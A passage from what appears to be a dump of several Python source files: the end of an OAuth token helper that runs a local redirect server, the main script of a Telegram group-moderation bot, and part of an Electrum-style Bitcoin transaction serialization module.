:rtype: :class:`wxc_sdk.tokens.Tokens``
"""
def serve_redirect():
"""
Temporarily start a web server to serve the redirect URI at http://localhost:6001/redirect'
:return: parses query of the GET on the redirect URI
"""
# mutable to hold the query result
oauth_response = dict()
class RedirectRequestHandler(http.server.BaseHTTPRequestHandler):
# handle the GET request on the redirect URI
# noinspection PyPep8Naming
def do_GET(self):
# serve exactly one GET on the redirect URI and then we are done
parsed = urllib.parse.urlparse(self.path)
if parsed.path == '/redirect':
log.debug('serve_redirect: got GET on /redirect')
query = urllib.parse.parse_qs(parsed.query)
oauth_response['query'] = query
# we are done
self.shutdown(self.server)
self.send_response(200)
self.flush_headers()
@staticmethod
def shutdown(server: socketserver.BaseServer):
log.debug('serve_redirect: shutdown of local web server requested')
threading.Thread(target=server.shutdown, daemon=True).start()
httpd = http.server.HTTPServer(server_address=('', 6001),
RequestHandlerClass=RedirectRequestHandler)
log.debug('serve_redirect: starting local web server for redirect URI')
httpd.serve_forever()
httpd.server_close()
log.debug(f'serve_redirect: server terminated, result {oauth_response["query"]}')
return oauth_response['query']
state = str(uuid.uuid4())
auth_url = self.auth_url(state=state)
with concurrent.futures.ThreadPoolExecutor() as executor:
# start web server
fut = executor.submit(serve_redirect)
# open authentication URL in local webbrowser
webbrowser.open(auth_url)
# wait for GET on redirect URI and get the result (parsed query of redirect URI)
try:
result = fut.result(timeout=120)
except concurrent.futures.TimeoutError:
try:
# post a dummy response to the redirect URI to stop the server
with requests.Session() as session:
session.get(self.redirect_url, params={'code': 'foo'})
except Exception:
pass
log.warning('Authorization did not finish in time (60 seconds)')
return
code = result['code'][0]
response_state = result['state'][0]
assert response_state == state
# get access tokens
new_tokens = self.tokens_from_code(code=code)
if new_tokens is None:
log.error('Failed to obtain tokens')
return None
return new_tokens
def get_cached_tokens(self, *, read_from_cache: Callable[[], Optional[Tokens]],
write_to_cache: Callable[[Tokens], None]) -> Optional[Tokens]:
"""
Get tokens.
Tokens are read from cache and then verified. If needed an OAuth flow is initiated to get a new
set of tokens. For this the redirect URL http://localhost:6001/redirect is expected.
:param read_from_cache: callback to read tokens from cache. Called without parameters and is expected to return
a :class:`wxc_sdk.tokens.Tokens` instance with the cached tokens. If cached tokens cannot be provided then
None should be returned.
:param write_to_cache: callback to write updated tokens back to cache. The callback is called with a
:class:`wxc_sdk.tokens.Tokens` instance as only argument.
:return: set of tokens or None
:rtype: :class:`wxc_sdk.tokens.Tokens`
"""
# read tokens from cache
tokens = read_from_cache()
if tokens:
# validate tokens
changed = self.validate_tokens(tokens=tokens)
if not tokens.access_token:
tokens = None
elif changed:
write_to_cache(tokens)
if not tokens:
# get new tokens via integration if needed
tokens = self.get_tokens_from_oauth_flow()
if tokens:
tokens.set_expiration()
write_to_cache(tokens)
return tokens
|
main.py
|
#from modules import *
#from modules.core import *
from config import *
import modules.core.database as database
import modules.core.welcome as welcome
#import modules.core.extract as extract
import modules.core.filter as filter
import modules.core.unparse as unparse
import modules.delete as delete
import modules.core.note as note
import modules.core.rule as rule
import modules.core.warn as warn
import modules.core.ban as ban
import modules.core.edit as edit
import modules.core.extract as extract
import modules.core.fun as fun
import modules.core.help as help
import modules.core.system as system
import modules.extras as extras
from telegram import Message, Chat, Update, Bot, User, ChatMember
from telegram import ParseMode, InlineKeyboardMarkup, InlineKeyboardButton, ReplyKeyboardMarkup
from telegram.error import Unauthorized, BadRequest, TimedOut, NetworkError, ChatMigrated, TelegramError
from telegram.ext import Updater, CommandHandler, MessageHandler, Filters, CallbackQueryHandler, CallbackContext
from telegram.utils.helpers import escape_markdown
import logging
from mysql import connector
import time
import sys
import os
import threading
from tg_bot.scripts.modules.core.fun import fbi_joke
"""
import concurrent.futures
from concurrent.futures import ProcessPoolExecutor
import multiprocessing
import threading"""
print("imoprted modules")
# Bot Logging & Debugging
platform = sys.platform
path = path = str(os.path.dirname(os.path.dirname(sys.argv[0])))
stdoutOrigin = sys.stdout
deb = 1 # switch to 1 when debugging, to prevent log file creation
if platform == "linux" or platform == "linux2" or platform == "darwin":
sys.stderr = open(path+"/../logs/log_bot_runtime.log", 'w')
elif platform == "win32":
wp= path + '\\logs\\log_bot_runtime.log'
filename = os.path.join(wp)
if deb == 0:
logging.basicConfig(filename=filename,
filemode='a',
format='%(asctime)s %(levelname)s %(name)s %(message)s',
level=logging.DEBUG)
#sys.stdout = open(wp, 'w')
sys.stderr = open(wp, 'w')
else:
logging.basicConfig(
format='%(asctime)s %(levelname)s %(name)s %(message)s',
level=logging.DEBUG)
logger = logging.getLogger(__name__)
class writer(object):
log = []
def write(self, data):
self.log.append(data)
print("logging")
# Bot Authentication
print("authenticating")
updater = Updater(bot_token, use_context=True)
dp = updater.dispatcher
# Initialize Database & Cursor
botdb = None
def load():
global botdb
db = connector.connect(
host=database_host,
user=database_user,
password=database_password)
cursor = db.cursor(buffered=True)
sql = "CREATE DATABASE IF NOT EXISTS {s0}".format(s0=database_name)
cursor.execute(sql)
db = connector.connect(
host=database_host,
user=database_user,
password=database_password,
database=database_name)
cursor = db.cursor(buffered=True)
create_db = database.create_db().create_base()
#del create_db
botdb = database.bot_db()
load()
print("database loaded")
def unparse_func(update, context): # Unparse Incoming Responses
start = time.process_time()
# user_status = context.bot.get_chat_member(chat['id'], user['id'])
# print(user_status['status'])
# print(chatmember)
# print(eval(str(context.bot.getChat(chat['id']).permissions)))
threading.Thread(target=unparse.filter, args=(update,context), daemon=True).start()
print("\n", time.process_time() - start, "\n")
def button(update: Update, context: CallbackContext):
start = time.process_time()
query = update.callback_query
func = query.data.split(' ', 1)[0]
# print("\n", query.message.reply_markup, "\n")
# print("\n", query.message.reply_to_message.from_user, "\n")
# print("\n", query.data, "\n")
# print("\n", query.from_user, "\n")
# query.answer(text='you chose dog!', show_alert=True)
# full_msg = query.message.reply_to_message
if func == "veri":
but_veri(update,context) # try with later **locals()
print("\n", time.process_time() - start, "\n")
def but_veri(update: Update, context: CallbackContext):
query = update.callback_query
user = query.from_user
# print(user)
user_id = user.id
# print("\n", msg.new_chat_members[0].id)
# print(msg.from_user.id)
# print(user_id, "\n")
data = query.data.split(' ', 2)
msg = query.message.reply_to_message
if user_id == msg.new_chat_members[0].id:
chat = msg.chat
chat_id = chat.id
query.answer()
#text = query.data[2]
query.edit_message_text(text=data[2])
if data[1] == '0':
ban.ban_cls(update,context).unmute()
database.add_link(chat=chat, user=user, replace=1)
# user_status = context.bot.get_chat_member(chat_id, user_id)
# print(user_status['status'])
else:
query.answer(
text='You are already verified, This button is not for you !')
def start(update,context):
res = update.message.text.split(None,1)
try:
sub = res[1]
if sub == "start":
text = "This is " + bot_name + " & I am a telegram handler bot being developed with @jesvi_bot 's source code to provide users with a better UX experience... \n\nAdd me in a group and you can get started to use my features.\n\n" +\
"You can check out for my source/feature updates at @bot_garage_channel\n\nUse /help for more info about available commands & its uses.."
update.message.reply_text(text)
elif sub == "help":
help.help(update,context)
elif sub == "rules":
rule.rule_router(update,context)
elif sub == "set":
pass
elif sub == "note":
pass
elif sub.startswith('-') == True:
rule.rule_router(update,context)
except:
text = "This is " + bot_name + " & I am a telegram handler bot being developed with @jesvi_bot 's source code to provide users with a better UX experience... \n\nAdd me in a group and you can get started to use my features.\n\n" +\
"You can check out for my source/feature updates at @bot_garage_channel\n\nUse /help for more info about available commands & its uses.."
update.message.reply_text(text)
def main(): # Main Function
print("started")
uptime = str(time.strftime("%Y-%m-%d (%H:%M:%S)"))
if deb == 0:
logger = writer()
sys.stdout = logger
sys.stderr = logger
dp.bot.send_message(chat_id=owner_id, text="<code>Started Service !\n\nTime : " +
uptime + "</code>", parse_mode="HTML")
start_cmd = ("start", "about")
dp.add_handler(CommandHandler(start_cmd, start))
dp.add_handler(MessageHandler(
Filters.status_update.new_chat_members, welcome.gate))
dp.add_handler(MessageHandler(
Filters.status_update.left_chat_member, welcome.farewell))
delete_cmd = ("del", "purge", "sdel")
dp.add_handler(CommandHandler(delete_cmd, delete.delete_router))
filter_cmd = ("lock", "unlock", "filter", "filteradd", "filterdel")
dp.add_handler(CommandHandler(filter_cmd, filter.filter_router))
notes_cmd = ("notes", "noteadd", "notedel")
dp.add_handler(CommandHandler(notes_cmd, note.note_router))
warn_cmd = ("warn", "warninfo", "warnclear", "warnremove")
dp.add_handler(CommandHandler(warn_cmd, warn.warn_router))
ban_cmd = ("ban", "unban", "kick", "mute", "unmute","leave", "rip")
dp.add_handler(CommandHandler(ban_cmd, ban.thread_ban))
rule_cmd = ("rules", "rule","ruleset", "ruledel")
dp.add_handler(CommandHandler(rule_cmd, rule.rule_router))
extras_cmd = ("search")
dp.add_handler(CommandHandler(extras_cmd, extras.extras_threading))
system_cmd = ("net", "sql", "system", "cmd", "server", "publish")
dp.add_handler(CommandHandler(system_cmd, system.system_threading))
dp.add_handler(CommandHandler("scoot", quit_))
fun_cmd = ("boom")
dp.add_handler(CommandHandler(fun_cmd, fun.boom))
fun_cmd = ("oof")
dp.add_handler(CommandHandler(fun_cmd, fun.oof))
fun_cmd = ("fbi")
dp.add_handler(CommandHandler(fun_cmd, fun.fbi_joke))
help_cmd = ("help")
dp.add_handler(CommandHandler(help_cmd, help.help))
edit_cmd = ("promote", "demote", "pin", "unpin", "bio", "bioset", "biodel", "descset", "nickset", "titleset")
dp.add_handler(CommandHandler(edit_cmd, edit.edit_router))
info_cmd = ("info", "group", "msgid", "json", "sync")
dp.add_handler(CommandHandler(info_cmd, unparse.thread_unparse))
dp.add_handler(CallbackQueryHandler(button))
dp.add_handler(MessageHandler(Filters.all, unparse_func))
#dp.add_handler(MessageHandler(Filters.all, unparse.thread_unparse))
updater.start_polling()
updater.idle()
def quit_(update,context):
m = extract.sudo_check_2(msg=update.message,del_lvl=7,context=context,sudo=1)
if m== 7:
pass
else: return
context.bot.send_message(chat_id=update.message['chat']["id"],text="Terminating !" ,
parse_mode="HTML")
updater.stop()
exit(1)
system.exit(1)
return
if __name__ == '__main__':
main()
#new stuff for sub-main 2
|
transaction.py
|
#!/usr/bin/env python3
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Note: The deserialization code originally comes from ABE.
from .util import print_error, profiler
from .caches import ExpiringCache
from .bitcoin import *
from .address import (PublicKey, Address, Script, ScriptOutput, hash160,
UnknownAddress, OpCodes as opcodes,
P2PKH_prefix, P2PKH_suffix, P2SH_prefix, P2SH_suffix)
from . import schnorr
from . import util
import struct
import warnings
#
# Workalike python implementation of Bitcoin's CDataStream class.
#
from .keystore import xpubkey_to_address, xpubkey_to_pubkey
NO_SIGNATURE = 'ff'
class SerializationError(Exception):
""" Thrown when there's a problem deserializing or serializing """
class InputValueMissing(ValueError):
""" thrown when the value of an input is needed but not present """
class BCDataStream(object):
def __init__(self):
self.input = None
self.read_cursor = 0
def clear(self):
self.input = None
self.read_cursor = 0
def write(self, _bytes): # Initialize with string of _bytes
if self.input is None:
self.input = bytearray(_bytes)
else:
self.input += bytearray(_bytes)
def read_string(self, encoding='ascii'):
# Strings are encoded depending on length:
# 0 to 252 : 1-byte-length followed by bytes (if any)
# 253 to 65,535 : byte'253' 2-byte-length followed by bytes
# 65,536 to 4,294,967,295 : byte '254' 4-byte-length followed by bytes
# ... and the Bitcoin client is coded to understand:
# greater than 4,294,967,295 : byte '255' 8-byte-length followed by bytes of string
# ... but I don't think it actually handles any strings that big.
if self.input is None:
raise SerializationError("call write(bytes) before trying to deserialize")
length = self.read_compact_size()
return self.read_bytes(length).decode(encoding)
def write_string(self, string, encoding='ascii'):
string = to_bytes(string, encoding)
# Length-encoded as with read-string
self.write_compact_size(len(string))
self.write(string)
def read_bytes(self, length):
try:
result = self.input[self.read_cursor:self.read_cursor+length]
self.read_cursor += length
return result
except IndexError:
raise SerializationError("attempt to read past end of buffer")
return ''
def can_read_more(self) -> bool:
if not self.input:
return False
return self.read_cursor < len(self.input)
def read_boolean(self): return self.read_bytes(1)[0] != chr(0)
def read_int16(self): return self._read_num('<h')
def read_uint16(self): return self._read_num('<H')
def read_int32(self): return self._read_num('<i')
def read_uint32(self): return self._read_num('<I')
def read_int64(self): return self._read_num('<q')
def read_uint64(self): return self._read_num('<Q')
def write_boolean(self, val): return self.write(chr(1) if val else chr(0))
def write_int16(self, val): return self._write_num('<h', val)
def write_uint16(self, val): return self._write_num('<H', val)
def write_int32(self, val): return self._write_num('<i', val)
def write_uint32(self, val): return self._write_num('<I', val)
def write_int64(self, val): return self._write_num('<q', val)
def write_uint64(self, val): return self._write_num('<Q', val)
def read_compact_size(self):
try:
size = self.input[self.read_cursor]
self.read_cursor += 1
if size == 253:
size = self._read_num('<H')
elif size == 254:
size = self._read_num('<I')
elif size == 255:
size = self._read_num('<Q')
return size
except IndexError:
raise SerializationError("attempt to read past end of buffer")
def write_compact_size(self, size):
if size < 0:
raise SerializationError("attempt to write size < 0")
elif size < 253:
self.write(bytes([size]))
elif size < 2**16:
self.write(b'\xfd')
self._write_num('<H', size)
elif size < 2**32:
self.write(b'\xfe')
self._write_num('<I', size)
elif size < 2**64:
self.write(b'\xff')
self._write_num('<Q', size)
def _read_num(self, format):
try:
(i,) = struct.unpack_from(format, self.input, self.read_cursor)
self.read_cursor += struct.calcsize(format)
except Exception as e:
raise SerializationError(e)
return i
def _write_num(self, format, num):
s = struct.pack(format, num)
self.write(s)
# This function comes from bitcointools, bct-LICENSE.txt.
def long_hex(bytes):
return bytes.encode('hex_codec')
# This function comes from bitcointools, bct-LICENSE.txt.
def short_hex(bytes):
t = bytes.encode('hex_codec')
if len(t) < 11:
return t
return t[0:4]+"..."+t[-4:]
def match_decoded(decoded, to_match):
if len(decoded) != len(to_match):
return False
for i in range(len(decoded)):
op = decoded[i][0]
if to_match[i] == opcodes.OP_PUSHDATA4 and op <= opcodes.OP_PUSHDATA4 and op > 0:
# Opcodes below OP_PUSHDATA4 just push data onto stack, and are equivalent.
# Note we explicitly don't match OP_0, OP_1 through OP_16 and OP1_NEGATE here
continue
if to_match[i] != op:
return False
return True
def parse_sig(x_sig):
return [None if x == NO_SIGNATURE else x for x in x_sig]
def safe_parse_pubkey(x):
try:
return xpubkey_to_pubkey(x)
except:
return x
def parse_scriptSig(d, _bytes):
try:
decoded = Script.get_ops(_bytes)
except Exception as e:
# coinbase transactions raise an exception
print_error("cannot find address in input script", bh2u(_bytes))
return
match = [ opcodes.OP_PUSHDATA4 ]
if match_decoded(decoded, match):
item = decoded[0][1]
# payto_pubkey
d['type'] = 'p2pk'
d['signatures'] = [bh2u(item)]
d['num_sig'] = 1
d['x_pubkeys'] = ["(pubkey)"]
d['pubkeys'] = ["(pubkey)"]
return
# non-generated TxIn transactions push a signature
# (seventy-something bytes) and then their public key
# (65 bytes) onto the stack:
match = [ opcodes.OP_PUSHDATA4, opcodes.OP_PUSHDATA4 ]
if match_decoded(decoded, match):
sig = bh2u(decoded[0][1])
x_pubkey = bh2u(decoded[1][1])
try:
signatures = parse_sig([sig])
pubkey, address = xpubkey_to_address(x_pubkey)
except:
print_error("cannot find address in input script", bh2u(_bytes))
return
d['type'] = 'p2pkh'
d['signatures'] = signatures
d['x_pubkeys'] = [x_pubkey]
d['num_sig'] = 1
d['pubkeys'] = [pubkey]
d['address'] = address
return
# p2sh transaction, m of n
match = [ opcodes.OP_0 ] + [ opcodes.OP_PUSHDATA4 ] * (len(decoded) - 1)
if not match_decoded(decoded, match):
print_error("cannot find address in input script", bh2u(_bytes))
return
x_sig = [bh2u(x[1]) for x in decoded[1:-1]]
m, n, x_pubkeys, pubkeys, redeemScript = parse_redeemScript(decoded[-1][1])
# write result in d
d['type'] = 'p2sh'
d['num_sig'] = m
d['signatures'] = parse_sig(x_sig)
d['x_pubkeys'] = x_pubkeys
d['pubkeys'] = pubkeys
d['redeemScript'] = redeemScript
d['address'] = Address.from_P2SH_hash(hash160(redeemScript))
def parse_redeemScript(s):
dec2 = Script.get_ops(s)
# the following throw exception when redeemscript has one or zero opcodes
m = dec2[0][0] - opcodes.OP_1 + 1
n = dec2[-2][0] - opcodes.OP_1 + 1
op_m = opcodes.OP_1 + m - 1
op_n = opcodes.OP_1 + n - 1
match_multisig = [ op_m ] + [opcodes.OP_PUSHDATA4]*n + [ op_n, opcodes.OP_CHECKMULTISIG ]
if not match_decoded(dec2, match_multisig):
# causes exception in caller when mismatched
print_error("cannot find address in input script", bh2u(s))
return
x_pubkeys = [bh2u(x[1]) for x in dec2[1:-2]]
pubkeys = [safe_parse_pubkey(x) for x in x_pubkeys]
redeemScript = Script.multisig_script(m, [bytes.fromhex(p)
for p in pubkeys])
return m, n, x_pubkeys, pubkeys, redeemScript
def get_address_from_output_script(_bytes):
scriptlen = len(_bytes)
if scriptlen == 23 and _bytes.startswith(P2SH_prefix) and _bytes.endswith(P2SH_suffix):
# Pay-to-script-hash
return TYPE_ADDRESS, Address.from_P2SH_hash(_bytes[2:22])
if scriptlen == 25 and _bytes.startswith(P2PKH_prefix) and _bytes.endswith(P2PKH_suffix):
# Pay-to-pubkey-hash
return TYPE_ADDRESS, Address.from_P2PKH_hash(_bytes[3:23])
if scriptlen == 35 and _bytes[0] == 33 and _bytes[1] in (2,3) and _bytes[34] == opcodes.OP_CHECKSIG:
# Pay-to-pubkey (compressed)
return TYPE_PUBKEY, PublicKey.from_pubkey(_bytes[1:34])
if scriptlen == 67 and _bytes[0] == 65 and _bytes[1] == 4 and _bytes[66] == opcodes.OP_CHECKSIG:
# Pay-to-pubkey (uncompressed)
return TYPE_PUBKEY, PublicKey.from_pubkey(_bytes[1:66])
# note: we don't recognize bare multisigs.
return TYPE_SCRIPT, ScriptOutput.protocol_factory(bytes(_bytes))
def parse_input(vds):
d = {}
prevout_hash = hash_encode(vds.read_bytes(32))
prevout_n = vds.read_uint32()
scriptSig = vds.read_bytes(vds.read_compact_size())
sequence = vds.read_uint32()
d['prevout_hash'] = prevout_hash
d['prevout_n'] = prevout_n
d['sequence'] = sequence
d['address'] = UnknownAddress()
if prevout_hash == '00'*32:
d['type'] = 'coinbase'
d['scriptSig'] = bh2u(scriptSig)
else:
d['x_pubkeys'] = []
d['pubkeys'] = []
d['signatures'] = {}
d['address'] = None
d['type'] = 'unknown'
d['num_sig'] = 0
d['scriptSig'] = bh2u(scriptSig)
try:
parse_scriptSig(d, scriptSig)
except Exception as e:
print_error('{}: Failed to parse tx input {}:{}, probably a p2sh (non multisig?). Exception was: {}'.format(__name__, prevout_hash, prevout_n, repr(e)))
# that whole heuristic codepath is fragile; just ignore it when it dies.
# failing tx examples:
# 1c671eb25a20aaff28b2fa4254003c201155b54c73ac7cf9c309d835deed85ee
# 08e1026eaf044127d7103415570afd564dfac3131d7a5e4b645f591cd349bb2c
# override these once more just to make sure
d['address'] = UnknownAddress()
d['type'] = 'unknown'
if not Transaction.is_txin_complete(d):
del d['scriptSig']
d['value'] = vds.read_uint64()
return d
def parse_output(vds, i):
d = {}
d['value'] = vds.read_int64()
scriptPubKey = vds.read_bytes(vds.read_compact_size())
d['type'], d['address'] = get_address_from_output_script(scriptPubKey)
d['scriptPubKey'] = bh2u(scriptPubKey)
d['prevout_n'] = i
return d
def deserialize(raw):
vds = BCDataStream()
vds.write(bfh(raw))
d = {}
start = vds.read_cursor
d['version'] = vds.read_int32()
n_vin = vds.read_compact_size()
d['inputs'] = [parse_input(vds) for i in range(n_vin)]
n_vout = vds.read_compact_size()
d['outputs'] = [parse_output(vds, i) for i in range(n_vout)]
d['lockTime'] = vds.read_uint32()
if vds.can_read_more():
raise SerializationError('extra junk at the end')
return d
# pay & redeem scripts
def multisig_script(public_keys, m):
n = len(public_keys)
assert n <= 15
assert m <= n
op_m = push_script_bytes(bytes([m])).hex()
op_n = push_script_bytes(bytes([n])).hex()
keylist = [push_script(k) for k in public_keys]
return op_m + ''.join(keylist) + op_n + bytes([opcodes.OP_CHECKMULTISIG]).hex()
class Transaction:
SIGHASH_FORKID = 0x40 # do not use this; deprecated
FORKID = 0x000000 # do not use this; deprecated
def __str__(self):
if self.raw is None:
self.raw = self.serialize()
return self.raw
def __init__(self, raw, sign_schnorr=False):
if raw is None:
self.raw = None
elif isinstance(raw, str):
self.raw = raw.strip() if raw else None
elif isinstance(raw, dict):
self.raw = raw['hex']
else:
raise BaseException("cannot initialize transaction", raw)
self._inputs = None
self._outputs = None
self.locktime = 0
self.version = 1
self._sign_schnorr = sign_schnorr
# attribute used by HW wallets to tell the hw keystore about any outputs
# in the tx that are to self (change), etc. See wallet.py add_hw_info
# which writes to this dict and the various hw wallet plugins which
# read this dict.
self.output_info = dict()
# Ephemeral meta-data used internally to keep track of interesting
# things. This is currently written-to by coinchooser to tell UI code
# about 'dust_to_fee', which is change that's too small to go to change
# outputs (below dust threshold) and needed to go to the fee.
#
# It is also used to store the 'fetched_inputs' which are asynchronously
# retrieved inputs (by retrieving prevout_hash tx's), see
#`fetch_input_data`.
#
# Values in this dict are advisory only and may or may not always be
# there!
self.ephemeral = dict()
def is_memory_compact(self):
"""Returns True if the tx is stored in memory only as self.raw (serialized) and has no deserialized data
structures currently in memory. """
return (self.raw is not None
and self._inputs is None and self._outputs is None and self.locktime == 0 and self.version == 1)
def set_sign_schnorr(self, b):
self._sign_schnorr = b
def update(self, raw):
self.raw = raw
self._inputs = None
self.deserialize()
def inputs(self):
if self._inputs is None:
self.deserialize()
return self._inputs
def outputs(self):
if self._outputs is None:
self.deserialize()
return self._outputs
@classmethod
def get_sorted_pubkeys(self, txin):
# sort pubkeys and x_pubkeys, using the order of pubkeys
# Note: this function is CRITICAL to get the correct order of pubkeys in
# multisignatures; avoid changing.
x_pubkeys = txin['x_pubkeys']
pubkeys = txin.get('pubkeys')
if pubkeys is None:
pubkeys = [xpubkey_to_pubkey(x) for x in x_pubkeys]
pubkeys, x_pubkeys = zip(*sorted(zip(pubkeys, x_pubkeys)))
txin['pubkeys'] = pubkeys = list(pubkeys)
txin['x_pubkeys'] = x_pubkeys = list(x_pubkeys)
return pubkeys, x_pubkeys
def update_signatures(self, signatures):
"""Add new signatures to a transaction
`signatures` is expected to be a list of hex encoded sig strings with
*no* sighash byte at the end (implicitly always 0x41 (SIGHASH_FORKID|SIGHASH_ALL);
will be added by this function).
signatures[i] is intended for self._inputs[i].
The signature will be matched with the appropriate pubkey automatically
in the case of multisignature wallets.
This function is used by the Trezor, KeepKey, etc to update the
transaction with signatures form the device.
Note this function supports both Schnorr and ECDSA signatures, but as
yet no hardware wallets are signing Schnorr.
"""
if self.is_complete():
return
if not isinstance(signatures, (tuple, list)):
raise Exception('API changed: update_signatures expects a list.')
if len(self.inputs()) != len(signatures):
raise Exception('expected {} signatures; got {}'.format(len(self.inputs()), len(signatures)))
for i, txin in enumerate(self.inputs()):
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
sig = signatures[i]
if not isinstance(sig, str):
raise ValueError("sig was bytes, expected string")
# sig_final is the signature with the sighashbyte at the end (0x41)
sig_final = sig + '41'
if sig_final in txin.get('signatures'):
# skip if we already have this signature
continue
pre_hash = Hash(bfh(self.serialize_preimage(i)))
sig_bytes = bfh(sig)
added = False
reason = []
for j, pubkey in enumerate(pubkeys):
# see which pubkey matches this sig (in non-multisig only 1 pubkey, in multisig may be multiple pubkeys)
if self.verify_signature(bfh(pubkey), sig_bytes, pre_hash, reason):
print_error("adding sig", i, j, pubkey, sig_final)
self._inputs[i]['signatures'][j] = sig_final
added = True
if not added:
resn = ', '.join(reversed(reason)) if reason else ''
print_error("failed to add signature {} for any pubkey for reason(s): '{}' ; pubkey(s) / sig / pre_hash = ".format(i, resn),
pubkeys, '/', sig, '/', bh2u(pre_hash))
# redo raw
self.raw = self.serialize()
def is_schnorr_signed(self, input_idx):
''' Return True IFF any of the signatures for a particular input
are Schnorr signatures (Schnorr signatures are always 64 bytes + 1) '''
if (isinstance(self._inputs, (list, tuple))
and input_idx < len(self._inputs)
and self._inputs[input_idx]):
# Schnorr sigs are always 64 bytes. However the sig has a hash byte
# at the end, so that's 65. Plus we are hex encoded, so 65*2=130
return any(isinstance(sig, (str, bytes)) and len(sig) == 130
for sig in self._inputs[input_idx].get('signatures', []))
return False
def deserialize(self):
if self.raw is None:
return
if self._inputs is not None:
return
d = deserialize(self.raw)
self.invalidate_common_sighash_cache()
self._inputs = d['inputs']
self._outputs = [(x['type'], x['address'], x['value']) for x in d['outputs']]
assert all(isinstance(output[1], (PublicKey, Address, ScriptOutput))
for output in self._outputs)
self.locktime = d['lockTime']
self.version = d['version']
return d
@classmethod
def from_io(klass, inputs, outputs, locktime=0, sign_schnorr=False):
assert all(isinstance(output[1], (PublicKey, Address, ScriptOutput))
for output in outputs)
self = klass(None)
self._inputs = inputs
self._outputs = outputs.copy()
self.locktime = locktime
self.set_sign_schnorr(sign_schnorr)
return self
@classmethod
def pay_script(self, output):
return output.to_script().hex()
@classmethod
def estimate_pubkey_size_from_x_pubkey(cls, x_pubkey):
try:
if x_pubkey[0:2] in ['02', '03']: # compressed pubkey
return 0x21
elif x_pubkey[0:2] == '04': # uncompressed pubkey
return 0x41
elif x_pubkey[0:2] == 'ff': # bip32 extended pubkey
return 0x21
elif x_pubkey[0:2] == 'fe': # old electrum extended pubkey
return 0x41
except Exception as e:
pass
return 0x21 # just guess it is compressed
@classmethod
def estimate_pubkey_size_for_txin(cls, txin):
pubkeys = txin.get('pubkeys', [])
x_pubkeys = txin.get('x_pubkeys', [])
if pubkeys and len(pubkeys) > 0:
return cls.estimate_pubkey_size_from_x_pubkey(pubkeys[0])
elif x_pubkeys and len(x_pubkeys) > 0:
return cls.estimate_pubkey_size_from_x_pubkey(x_pubkeys[0])
else:
return 0x21 # just guess it is compressed
@classmethod
def get_siglist(self, txin, estimate_size=False, sign_schnorr=False):
# if we have enough signatures, we use the actual pubkeys
# otherwise, use extended pubkeys (with bip32 derivation)
num_sig = txin.get('num_sig', 1)
if estimate_size:
pubkey_size = self.estimate_pubkey_size_for_txin(txin)
pk_list = ["00" * pubkey_size] * len(txin.get('x_pubkeys', [None]))
# we assume that signature will be 0x48 bytes long if ECDSA, 0x41 if Schnorr
if sign_schnorr:
siglen = 0x41
else:
siglen = 0x48
sig_list = [ "00" * siglen ] * num_sig
else:
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
x_signatures = txin['signatures']
signatures = list(filter(None, x_signatures))
is_complete = len(signatures) == num_sig
if is_complete:
pk_list = pubkeys
sig_list = signatures
else:
pk_list = x_pubkeys
sig_list = [sig if sig else NO_SIGNATURE for sig in x_signatures]
return pk_list, sig_list
@classmethod
def input_script(self, txin, estimate_size=False, sign_schnorr=False):
# For already-complete transactions, scriptSig will be set and we prefer
# to use it verbatim in order to get an exact reproduction (including
# malleated push opcodes, etc.).
scriptSig = txin.get('scriptSig', None)
if scriptSig is not None:
return scriptSig
# For partially-signed inputs, or freshly signed transactions, the
# scriptSig will be missing and so we construct it from pieces.
_type = txin['type']
if _type == 'coinbase':
raise RuntimeError('Attempted to serialize coinbase with missing scriptSig')
pubkeys, sig_list = self.get_siglist(txin, estimate_size, sign_schnorr=sign_schnorr)
script = ''.join(push_script(x) for x in sig_list)
if _type == 'p2pk':
pass
elif _type == 'p2sh':
# put op_0 before script
script = '00' + script
redeem_script = multisig_script(pubkeys, txin['num_sig'])
script += push_script(redeem_script)
elif _type == 'p2pkh':
script += push_script(pubkeys[0])
elif _type == 'unknown':
raise RuntimeError('Cannot serialize unknown input with missing scriptSig')
return script
@classmethod
def is_txin_complete(cls, txin):
if txin['type'] == 'coinbase':
return True
num_sig = txin.get('num_sig', 1)
if num_sig == 0:
return True
x_signatures = txin['signatures']
signatures = list(filter(None, x_signatures))
return len(signatures) == num_sig
@classmethod
def get_preimage_script(self, txin):
_type = txin['type']
if _type == 'p2pkh':
return txin['address'].to_script().hex()
elif _type == 'p2sh':
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
return multisig_script(pubkeys, txin['num_sig'])
elif _type == 'p2pk':
pubkey = txin['pubkeys'][0]
return public_key_to_p2pk_script(pubkey)
elif _type == 'unknown':
# this approach enables most P2SH smart contracts (but take care if using OP_CODESEPARATOR)
return txin['scriptCode']
else:
raise RuntimeError('Unknown txin type', _type)
@classmethod
def serialize_outpoint(self, txin):
return bh2u(bfh(txin['prevout_hash'])[::-1]) + int_to_hex(txin['prevout_n'], 4)
@classmethod
def serialize_input(self, txin, script, estimate_size=False):
# Prev hash and index
s = self.serialize_outpoint(txin)
# Script length, script, sequence
s += var_int(len(script)//2)
s += script
s += int_to_hex(txin.get('sequence', 0xffffffff - 1), 4)
# offline signing needs to know the input value
if ('value' in txin
and txin.get('scriptSig') is None
and not (estimate_size or self.is_txin_complete(txin))):
s += int_to_hex(txin['value'], 8)
return s
def BIP_LI01_sort(self):
